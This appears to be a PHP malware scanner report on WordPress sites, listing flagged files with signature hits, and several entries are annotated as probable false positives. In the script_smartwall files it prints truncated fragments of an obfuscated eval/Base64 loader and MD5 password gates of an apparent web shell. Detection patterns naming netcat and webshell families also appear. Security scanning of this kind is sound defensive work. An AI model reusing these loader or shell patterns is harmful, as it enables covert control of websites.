eval('?>'.$this->compile($source)); } } $this->log( Mustache_Logger::DEBUG, 'Instantiating template: "{className}"', array('className' => $className) ); $this->templates[$className] = new $className($this); } return $this->templates[$className]; } private function tokenize($source) { return $this->getTokenizer()->scan($source); } private function parse($source) { return $this->getParser()->parse($this->tokenize($source)); } private function compile($source) { $tree = $this->parse($source); $name...
| Sign 11413268 Line: 602 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/profile-builder/assets/lib/wck-api/wordpress-creation-kit.php Size: 60.54 kB Created: 2020-03-07 13:50:19 Modified: 2021-03-17 22:57:57 Dangers: 2
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/woo-qiwi-payment-gateway/vendor/ramsey/uuid/src/Provider/Node/SystemNodeProvider.php Size: 3.44 kB Created: 2021-03-17 21:32:01 Modified: 2021-03-17 21:32:01 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit php_uname Line: 70 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('a')
| Exploit php_uname Line: 98 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('s')
| Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] |
passthru('ipconfig /all 2>&1'); break; case 'DAR': passthru('ifconfig 2>&1'); break; case 'FRE': passthru('netstat -i -f link 2>&1'); break; case 'LIN': default: passthru('netstat -ie 2>&1'); break; } return ob_get_clean(); } protected function getSysfs() { $mac = false; if (strtoupper(php_uname('s')) === 'LINUX') { $addressPaths = glob('/sys/class/net/*/address', GLOB_NOSORT); if (empty($addressPaths)) { return false; } array_walk($addressPaths, function ($addressPath) use (&$macs) { $macs[] = ...
| Sign 085a0329 Line: 72 Dangerous Malware Signature (hash: 085a0329) |
ipconfig
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/woo-qiwi-payment-gateway/vendor/curl/curl/src/Curl/Curl.php Size: 18.49 kB Created: 2021-03-17 21:32:01 Modified: 2021-03-17 21:32:01 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->response_headers = array(); $this->response = curl_exec($this->curl); $this->curl_error_code = curl_errno($this->curl); $this->curl_error_message = curl_error($this->curl); $this->curl_error = !($this->curl_error_code === 0); $this->http_status_code = curl_getinfo($this->curl, CURLINFO_HTTP_CODE); $this->http_error = in_array(floor($this->http_status_code / 100), array(4, 5)); $this->error = $this->curl_error || $this->http_error; $this->error_code = $this->error ? ($this->curl_e...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/woo-qiwi-payment-gateway/vendor/curl/curl/tests/server/php-curl-test/deploy.php Size: 904.00 B Created: 2021-03-17 21:32:01 Modified: 2021-03-17 21:32:01 Warns: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($command); $output .= "<span style=\"color: #6BE234;\">\$</span> <span style=\"color: #729FCF;\">{$command}\n</span>"; $output .= htmlentities(trim($tmp))
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/woo-qiwi-payment-gateway/vendor/qiwi/bill-payments-php-sdk/src/BillPayments.php Size: 18.75 kB Created: 2021-03-17 21:32:01 Modified: 2021-03-17 21:32:01 Warns: 1
| Description | Match |
|---|
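Exploit concat_vars_with_spaces Line: 682 Warning The variable-concatenation technique is usually used for the obfuscation of malicious code. The variables in this match are named after URL components, which suggests a URL being reassembled; confirm on line 682 |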
$scheme.$user.$pass.$host.$port.$path.
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 5
| Description | Match |
|---|
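Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells that are code-golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]. The matched expression is a variable-function call on an options-array entry keyed by a `PCLZIP_CB_*` constant, and the rule appears to fire on any such callback invocation; compare the file with a pristine copy of the library before treating it as a webshell |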
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code injection: extracting a global variable array such as `$_POST` into the local scope allows remote attackers to overwrite variables and inject PHP code on the target machine via an HTTP request |
extract($_POST)
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Warns: 3
| Description | Match |
|---|
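Exploit too_many_chr Line: 1071 Warning Concatenating many `chr` calls is a technique usually used for the obfuscation of malicious code. The three matches on lines 1071-1073 are runs of consecutive character codes, which looks more like a lookup table than an encoded payload; confirm against the upstream TCPDF source |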
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-12-03 18:46:52 Modified: 2021-03-17 22:57:57 Dangers: 1
| Description | Match |
|---|
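Function str_rot13 eval_str_rot13 Line: 177 Dangerous ROT13-encoded name of the function `eval` [https://www.php.net/eval]. The match is the four-letter string `riny`, which can also occur inside an unrelated word; check line 177 for an actual `str_rot13` call before acting |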
riny
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-30 20:45:42 Modified: 2021-03-31 20:11:40 Warns: 1 Dangers: 1
| Description | Match |
|---|
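Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check, a pattern typically used in web shells. The matched check compares an unsalted MD5 of a request parameter using loose `==`; review it together with the `eval` and Base64 findings reported for `smartwall.php` in the same directory |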
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-30 20:45:41 Modified: 2021-03-31 20:11:39 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning File protected by an MD5 password check, a pattern typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-30 20:45:42 Modified: 2021-03-31 20:11:40 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
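| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval]. In this match `eval` runs the return value of a function applied to a long encoded string literal, so the executed code is hidden until decoded; prioritise this file for offline analysis |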
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
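| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d). The matched text `Z3ppbmZsYXRl` is the Base64 encoding of `gzinflate`, suggesting a further encoded layer that names a decompression function |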
Z3ppbmZsYXRl
|
|
//var/www/voronezh/data/www/intim-voronezha.info/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-30 20:45:42 Modified: 2021-03-17 22:57:56 Warns: 1 Dangers: 1
| Description | Match |
|---|
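Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check, a pattern typically used in web shells. The size, line number and hash match the `update.php` reported under `wp-content/script_smartwall`, so this looks like a second copy of the same file |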
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/voronezh/data/www/intim-voronezha.info/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-30 20:45:41 Modified: 2021-03-17 22:57:56 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning File protected by an MD5 password check, a pattern typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/voronezh/data/www/intim-voronezha.info/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-30 20:45:42 Modified: 2021-03-17 22:57:56 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/fbd/5ba/fbd5baf57f4a3e13e60b3ad4dc8fdbb3.php Size: 343.36 kB Created: 2020-11-30 19:22:05 Modified: 2020-11-30 19:22:05 Dangers: 1
| Description | Match |
|---|
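Sign 11413268 Line: 1372 Dangerous Malware Signature (hash: 11413268). Here the match is the bare word `exploit` in a cache file, whereas the same signature id is reported for `eval('?>` in `smartwall.php`; the id apparently covers more than one pattern, so judge each hit by its matched text and context |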
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/0ab/5a6/0ab5a64560fb20dc9d5e6c5ea662b057.php Size: 45.95 kB Created: 2020-11-30 19:22:14 Modified: 2020-11-30 19:22:14 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/ba8/86a/ba886a3388341724b8771ad7a8ed860b.php Size: 45.94 kB Created: 2020-11-30 19:22:14 Modified: 2020-11-30 19:22:14 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/dbd/ee4/dbdee4a9dca679997e4bd43c3c293092.php Size: 26.69 kB Created: 2020-11-30 19:22:08 Modified: 2020-11-30 19:22:08 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/8d2/19f/8d219f1370c0e393874bfb387255d810.php Size: 343.34 kB Created: 2020-11-30 19:22:05 Modified: 2020-11-30 19:22:05 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 1372 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/object/0c5/dde/0c5ddec9619cc0ed20e9d69ef625dee0.php Size: 26.68 kB Created: 2020-11-30 19:22:07 Modified: 2020-11-30 19:22:07 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/175/06f/17506fcfc7297253a07ad0edeb597452.php Size: 84.89 kB Created: 2020-11-30 19:21:51 Modified: 2020-11-30 19:21:51 Warns: 1 Dangers: 5
| Description | Match |
|---|
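Exploit base64_long Line: 406 Warning Long Base64-encoded text is usually used for the obfuscation of malicious code. The visible prefix of this match decodes to the start of a JSON object (`"homeurl"`, `"resultstype"`, ...), which looks like settings data embedded in a cached page rather than obfuscated PHP; decode the full string to confirm. The signature matches reported on the same line are short Base64-alphabet fragments and may simply fall inside this string |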
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 406 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 406 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 406 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 406 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 406 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
